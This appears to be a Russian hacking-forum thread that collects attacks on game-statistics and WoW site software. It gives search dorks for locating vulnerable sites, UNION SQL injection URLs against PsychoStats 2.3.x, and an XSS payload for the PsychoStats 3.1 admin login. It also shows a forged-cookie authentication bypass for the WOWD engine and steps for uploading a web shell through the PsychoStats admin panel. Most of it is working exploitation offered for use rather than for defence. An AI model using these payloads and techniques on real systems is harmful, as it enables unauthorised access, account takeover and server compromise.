название: vsp stats processor версия: 0.45 /*старше не встречал*/ dork: "powered by vsp stats processor" тип уязвимости: SQL-injection пути могут вариироватся вывод смотрим куда можна вывести 5.0.22::[email protected]::cod2stats вывод красивый..смотрим.. /*красивый потому, что видно сразу весь вывод, не нужно лимитом*/ поля и таблицы системы p.s. админки тут как таковой нет.. поэтому использовать можно для вывода других таблиц или если есть права на заливку/чтение файлов p.p.s. используется на серверах провайдеров /*локалки и тд*/
PsychoStats PsychoStats Google d0rk: "Powered by PsychoStats" [Full-disclosure] PsychoStats 3.0.6b and prior PsychoStats v3.0.6b Multiple Cross-Site Scripting Vulnerabilities ранее была ксс в логине [SQL-injection] Удалённый пользоваель может выполнить произвольный SQL-запрос. Уязвимости существуют из-за: отсутствия проверки параметра id в скрипте map.php отсутствия проверки параметра id в скрипте weapon.php Пример использования: p.s. ранее выкладывалось на ачате по кмс https://forum.antichat.ru/showpost.php?p=464066&postcount=3159 http://video.antichat.ru/file250.html з.з.ы. более ранние версии не рассматривались
PsychoStats Google d0rk: "Powered by PsychoStats" Multiple Remote SQL Injection Vulnerabilities PsychoStats v2.3 SQL Code: www.site.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- PsychoStats v2.3.1 SQL Code: www.site.com/map.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16,17-- PsychoStats v2.3.3 SQL Code: www.site.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
PsychoStats v3.1 XSS in PsychoStats v3.1 PHP: /admin/login.php?ref="><script>alert("XSS by Gromoza")</script>
WOWD Движок сайта WoW PHP: function check() { if(isset($_COOKIE[$this->config['site_cookie']])){ list($cookie['user_id'], $cookie['password_hash']) = @unserialize(stripslashes($_COOKIE[$this->config['site_cookie']])); if($cookie['user_id'] < 1)return false; $res = $this->DB->selectRow('realmd', "SELECT * FROM account WHERE `id` = ?d", $cookie['user_id']); if($cookie['password_hash'] == $res['sha_pass_hash']){ unset($res['password']); $this->user = $res; return true; }else{ return false; } }else{ return false; } } красивая дырень
Может ктониить подсказать, как ее раскрутить. Я как понял есть какая-то возможность sql-injection через куки провести, или я не так все понял?
вся фишка в @unserialize и PHP: if($cookie['password_hash'] == $res['sha_pass_hash']){ этом условии когда зарегаешся на двишке получиш подобные плюшки Code: wowduser=a%3A2%3A%7Bi%3A0%3Bs%3A4%3A%226106%22%3Bi%3A1%3Bs%3A40%3A%2258c3f53a0b2e80dd3c2990a8d3c691a16c78b9dd%22%3B%7D меняеш на Code: wowduser=a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22[тут id пользователя без квадратных скобок]%22%3Bi%3A1%3Bb%3A1%3B%7D возможна и скуль, но слепая
Спс за ответ. Можеш еще подсказать в каком файле эти строчки? Просто скачал движок, пока не нашел) Взарание спс)
chekist, качал вроде с _http://mangos.ru/forum точнее не скажу, уже не помню. Покавыпялся в нем на сайтах, походу версий его немерено и мало кто использует встроеную в него панель управления аккаунтом, а жаль =(
Заливка шелла через админку в PsychoStats 2.3.x Заходим в админку > значки, переименовываем шелл в что-то типо shell.PHP.asdgif, заливаем. Главное чтобы расширение оканчивалось на gif (jpg, png). Вот, собственно, и получаем шелл: www.target.com/[path]/images/icons/shell.PHP.hgfgif. Из-за неизвестного расширения Apache интерпритирует файл, как php-скрипт (если перед этим неизвестным расширением стоит .php.).
Можно и пхп залить. Заходи в Config->Images->Search list for static images Там будет написано: png, jpg, gif добавь через "," php и заливай php да и работает на 3.1